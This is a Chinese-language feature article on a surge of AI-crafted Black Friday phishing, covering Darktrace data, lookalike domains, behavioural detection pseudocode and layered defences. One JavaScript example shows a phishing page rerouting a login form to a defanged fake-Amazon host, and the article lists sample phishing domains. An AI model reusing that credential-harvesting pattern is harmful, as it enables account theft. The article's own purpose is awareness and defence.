每年11月下旬，全球消费者的注意力都会被一个词牢牢抓住：“Black Friday”（黑色星期五）。打折、秒杀、限时优惠……商家铆足了劲，消费者摩拳擦掌。然而，在这场全民狂欢的背后，另一群人也在“疯狂下单”——不是买商品，而是买你的身份、你的银行卡、你的企业邮箱。

根据英国网络安全公司Darktrace于2025年11月底发布的最新报告，在黑色星期五正式到来前的几周内，全球范围内的钓鱼攻击数量飙升620%。更令人不安的是，这些攻击不再是粗制滥造的“尼日利亚王子”式骗局，而是由生成式AI精心打磨、高度仿真的“数字赝品”，连资深IT人员都可能一时看走眼。

而在中国，虽然“黑五”并非本土节日，但随着跨境电商、海淘、国际品牌会员体系的普及，越来越多国人也成了这类攻击的目标。当一封看似来自“Amazon中国特惠”的邮件出现在你的收件箱，附带“您的订单已发货，请确认配送地址”的链接时，你点不点？

这不仅是一场消费心理战，更是一场技术层面的高维对抗。本文将深入剖析此次钓鱼潮的技术内核、攻击链条与防御逻辑，并通过国际案例映照国内风险，为个人用户、中小企业乃至大型组织提供可落地的安全启示。

一、“620%”不是夸张，是AI驱动的工业化钓鱼

Darktrace的数据并非危言耸听。其监测覆盖全球6500余家部署了Darktrace/EMAIL的企业客户，时间跨度从2025年10月1日至11月21日。结果显示：

黑色星期五相关关键词（如“deal”“sale”“limited offer”）在钓鱼邮件中的出现频率激增；

冒充美国主流零售商（Walmart、Target、Macy’s等）的钓鱼尝试在感恩节前一周同比上涨201%；

亚马逊成为最常被冒充的品牌，占所有全球消费类品牌钓鱼邮件的80%；

超过半数的钓鱼邮件长度超过1000字符，远超传统垃圾邮件的平均篇幅——这一特征被Darktrace视为生成式AI参与创作的强信号。

“过去，钓鱼邮件往往是模板化、语法错误频出的‘低级货’，”公共互联网反网络钓鱼工作组技术专家芦笛在接受本报采访时指出，“但现在，攻击者用ChatGPT或Gemini输入两个提示词，就能批量生成语气自然、排版精美、甚至带品牌Logo的促销邮件。普通人根本分不清真假。”

Darktrace团队曾做过一个实验：让一名非技术人员使用生成式AI，仅凭两条指令——“写一封黑色星期五促销邮件，模仿亚马逊风格”和“加入紧迫感，比如‘最后3小时’”——就生成了一封足以以假乱真的钓鱼邮件（为避免滥用，原文已做像素化处理）。邮件包含：

逼真的品牌色调与按钮设计；

个性化称呼（如“Hi Alex”）；

虚假倒计时器；

指向伪造登录页的“查看我的订单”按钮。

“这种邮件如果混在真实的促销洪流中，点击率会非常高，”芦笛说，“因为它的上下文完全合理——你确实可能在等一个包裹，也可能刚看过某个商品。”

二、钓鱼新套路：从“假网站”到“假营销域”

此次攻击潮中，另一个显著趋势是钓鱼基础设施的“合法化伪装”。

传统钓鱼往往使用明显可疑的域名，如amaz0n-deals.ru。但2025年的攻击者更狡猾：他们注册看似正规的“营销子域名”或“品牌合作站”，例如：

Pal.PetPlatz.com

Epicbrandmarketing.com

DealWatchdogs.net

这些域名乍看像是第三方比价平台或联盟营销站点，实则为钓鱼跳板。用户点击邮件中的“独家优惠”链接后，会被重定向至一个高仿亚马逊页面，要求“登录账户以领取折扣”。一旦输入账号密码，信息即被窃取；更高级的版本还会诱导用户填写信用卡号、CVV码，完成“一站式诈骗”。

更隐蔽的是，部分攻击链路采用多级跳转+动态内容加载，以规避静态URL扫描。例如：

// 钓鱼页面初始加载

fetch('https://api.dealwatchdogs[.]net/config')

.then(res => res.json())

.then(config => {

if (config.brand === 'amazon') {

document.getElementById('login-form').action =

'https://secure-login.fake-amazon[.]xyz/auth';

loadAmazonBranding();

}

});

这种动态构造使得传统基于黑名单的邮件网关（Secure Email Gateway, SEG）难以识别。Darktrace报告指出，约17%的此类钓鱼邮件成功绕过了传统SEG，最终抵达用户收件箱。

“问题在于，很多SEG只检查发件人IP、SPF/DKIM记录和URL黑名单，”芦笛解释，“但攻击者现在用的是合法注册的域名、通过云服务商发送邮件、链接指向短期存活的仿冒站——所有表面指标都‘干净’。真正的异常藏在语义、行为和上下文里。”

三、技术深潜：为什么AI能识破人类看不出的破绽？

那么，Darktrace的AI是如何做到提前拦截这些高仿真钓鱼的？

关键在于其自学习行为建模（Self-Learning Behavioral AI） 架构。与依赖规则或签名的传统方案不同，Darktrace/EMAIL会对每个用户建立“数字孪生”模型，持续学习其正常通信模式，包括：

常联系人列表及交互频率；

邮件语言风格（用词、句式、语气）；

发送/接收时间分布；

链接点击习惯；

附件类型偏好。

当一封新邮件到来时，系统会实时比对：

“这封声称来自‘Amazon’的邮件，是否符合该用户历史上与电商品牌的互动模式？发件域名是否首次出现？链接是否指向从未访问过的TLD？邮件语气是否突然变得急迫？”

哪怕邮件内容本身无恶意代码，只要行为上下文偏离基线，AI就会标记为可疑。

例如，某用户平时只在周五下午收到亚马逊物流通知，且从不点击邮件内链接，而是直接打开App查看。若某天上午9点收到一封“紧急账户验证”邮件，内含bit.ly短链接，即便内容写得再像官方通知，AI也会判定为异常。

这种检测逻辑可抽象为以下伪代码：

def is_phishing(email):

user_model = get_user_behavior_model(email.recipient)

# 检查发件人是否在可信列表

if email.sender not in user_model.trusted_senders:

score += 0.4

# 检查链接是否指向新域名

for link in email.links:

if link.domain not in user_model.visited_domains:

score += 0.3

# 检查语言紧迫性（基于NLP情感分析）

urgency_score = nlp.analyze_urgency(email.body)

if urgency_score > user_model.avg_urgency + 2*std_dev:

score += 0.2

# 检查是否包含敏感操作关键词

if contains_keywords(email.body, ['verify', 'confirm', 'update payment']):

score += 0.1

return score > 0.75 # 阈值可动态调整

值得注意的是，该模型无需预先标注“钓鱼样本”，而是通过无监督学习自动发现异常。这也解释了为何它能捕捉到“零日钓鱼”——即从未见过的新型攻击。

“这就像你最好的朋友突然用陌生口音给你打电话要钱，即使他说的内容合理，你也会觉得不对劲，”芦笛比喻道，“AI做的就是这种‘直觉判断’，只不过它基于数据，而非情感。”

四、中国镜像：黑五虽远，风险很近

尽管黑色星期五起源于美国，但其影响早已全球化。在中国，情况尤为特殊：

一方面，大量消费者通过亚马逊海外购、iHerb、Sephora US等平台参与黑五促销；另一方面，国内电商平台（如天猫双11、京东618）的营销模式与黑五高度相似——限时折扣、预售尾款、物流催促……这为本土化钓鱼提供了绝佳土壤。

事实上，工作组已监测到多起“中式黑五钓鱼”案例。例如：

伪造“菜鸟裹裹”通知：“您的双11包裹因地址不详被扣留，请立即更新”；

冒充“Apple中国”：“您有未领取的教育优惠，点击验证学生身份”；

仿冒银行短信：“双11消费达标，可申请提额，请登录www.icbc-verify[.]top”。

“攻击者正在本地化他们的剧本，”芦笛强调，“他们知道中国人更信任微信、支付宝、银行App，所以钓鱼入口也转向这些生态。比如诱导用户点击‘微信服务通知’里的链接，实则跳转至钓鱼页。”

更值得警惕的是，部分攻击已从C端蔓延至B端。有企业财务人员收到“供应商”邮件：“黑五期间汇率波动大，请尽快支付尾款以锁定价格”，附件为伪造的发票PDF，内嵌恶意宏。一旦启用宏，即触发Cobalt Strike beacon，导致内网沦陷。

“节假日是企业安全最松懈的时候，”芦笛提醒，“员工急于处理积压邮件，IT部门人手不足，攻击者正是利用这个窗口。”

五、防御指南：从个人到企业的三层防线

面对如此复杂的威胁，普通用户和组织该如何应对？工作组提出“三层防御”框架：

第一层：个人用户——建立“数字消费戒律”

绝不通过邮件链接登录账户。无论邮件多么逼真，手动输入官网地址或使用官方App；

启用多因素认证（MFA），优先选择FIDO2安全密钥或Authenticator App，避免短信验证码（易被SIM劫持）；

定期清理授权应用。在Google或Microsoft账户中检查“第三方应用权限”，撤销不再使用的授权；

警惕“紧迫感”话术。真正的商家不会用“最后10分钟”逼你行动；

安装浏览器扩展，如Netcraft或McAfee WebAdvisor，可实时标记可疑网站。

第二层：企业组织——超越传统邮件网关

传统SEG（如Proofpoint、Mimecast）在面对AI生成钓鱼时已显疲态。企业应考虑升级至上下文感知型邮件安全平台，具备以下能力：

行为基线建模（如Darktrace、Abnormal Security）；

跨域关联分析（邮件+端点+身份）；

自动化响应（如隔离邮件、禁用恶意链接）；

与Microsoft Purview等DLP系统集成，防止敏感数据外泄。

此外，必须实施条件访问策略（Conditional Access Policy）。例如，在Azure AD中配置：

# 示例：阻止高风险国家的登录尝试

New-AzureADMSConditionalAccessPolicy -DisplayName "Block High-Risk Countries" `

-Conditions @{Locations = @{IncludeLocations = "All"; ExcludeLocations = @("CN", "US")}} `

-GrantControls @{BuiltInControls = @("Block")}

第三层：生态治理——强化品牌与域名保护

电商平台、物流公司、银行等高频被仿冒机构应：

部署DMARC（Domain-based Message Authentication, Reporting & Conformance），防止域名被伪造；

注册常见拼写错误域名（如taoba0.com），并设置301重定向或空响应；

与安全社区共享钓鱼情报，推动黑名单快速更新；

在官网显著位置公示“唯一客服渠道”，教育用户识别官方通信。

“安全不是单点防御，而是生态共建，”芦笛总结道，“当每个环节都提高一点门槛，攻击者的成本就会指数级上升。”

六、未来展望：AI军备竞赛才刚刚开始

可以预见，随着多模态AI的发展，未来的钓鱼攻击将更加立体：

语音钓鱼（Vishing）：AI克隆客服声音致电用户；

视频钓鱼：Deepfake视频会议诱导转账；

跨应用钓鱼：在Slack、Teams中发送“订单异常”消息。

但防御方也在进化。例如，微软正在测试“行为DLP”（Data Loss Prevention），不依赖数据标签，而是通过分析用户行为异常来阻止误发敏感邮件；Google则推出“OAuth应用风险评分”，自动限制高风险第三方应用的权限请求。

“这场战争没有终点，”芦笛坦言，“但我们可以做到的是：让每一次点击都更有底气，让每一封邮件都经得起审视。”

结语：在狂欢中保持清醒，是对数字时代最基本的尊重

黑色星期五终会过去，但网络钓鱼不会。它只是换上新的马甲，等待下一个节日、下一次热点、下一场人性的松懈。

对于中国用户而言，或许不必追逐黑五折扣，但必须警惕随之而来的数字陷阱。毕竟，在这个万物互联的时代，你最大的资产不是信用卡额度，而是你的数字身份。

而守护它，需要的不仅是技术，更是一种清醒的日常习惯——在点击“立即抢购”之前，先问一句：“这链接，真的安全吗？”

编辑：芦笛（公共互联网反网络钓鱼工作组）